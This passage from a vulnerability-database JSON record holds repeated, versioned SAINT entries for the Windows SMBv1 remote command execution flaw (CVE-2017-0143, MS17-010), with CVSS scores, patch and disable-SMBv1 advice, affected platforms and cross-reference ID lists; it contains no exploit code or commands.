{"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": 
["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:19:31", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "a4e78b0a3861133458e4174696ad202977a2c3a25b13f1b0d786e745ae9e120f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "immutableFields": [], "lastseen": "2019-05-29T19:19:31", "modified": "2017-04-26T00:00:00", "objectVersion": "1.5", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 89}, "different_elements": ["cvss3", "cvss2"], "edition": 3, "lastseen": "2019-05-29T19:19:31"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: 
[96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2017-05-07T05:21:42", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": 
["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "606bbb8b84c472ff4ef07b651f67db0f7541b59202328912105aa47211e7b859", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "lastseen": "2017-05-07T05:21:42", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 42}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-05-07T05:21:42"}], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer 
Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "cvelist": ["CVE-2017-0143"], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "modified": "2017-04-26T00:00:00", "objectVersion": "1.6", "lastseen": "2021-07-28T14:33:33", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}, {"id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "bulletinFamily": "exploit", "title": "Windows SMBv1 Remote Command Execution", "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "published": "2017-04-26T00:00:00", "modified": "2017-04-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2017-0143"], "type": "saint", "lastseen": "2021-07-29T16:40:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "d6fe647cb4ebd5763d03a0356ecaf674eb43f399c7c95e6f750eb94527b9c092", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2017-05-02T17:21:23", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 27}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-05-02T17:21:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. 
\n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a3dcfe59f9e4d59fc298dfba20cdcedfd41940b643f793b54f3cf0eeab2a8151", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2018-08-30T20:07:51", "modified": "2017-04-26T00:00:00", "objectVersion": "1.3", "published": 
"2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 27}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T20:07:51"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-06-04T23:19:33", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-06-04T23:19:33", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "d269053c62cefd10023cf015414dc70236e9faafa018b4e9fae3eecc11db84ac", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, 
{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "immutableFields": [], "lastseen": "2019-06-04T23:19:33", "modified": "2017-04-26T00:00:00", "objectVersion": "1.5", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 309}, "different_elements": ["cvss3", "cvss2"], "edition": 5, "lastseen": "2019-06-04T23:19:33"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). 
\n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 4, "enchantments": {"dependencies": {"modified": "2018-08-31T00:08:18", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], 
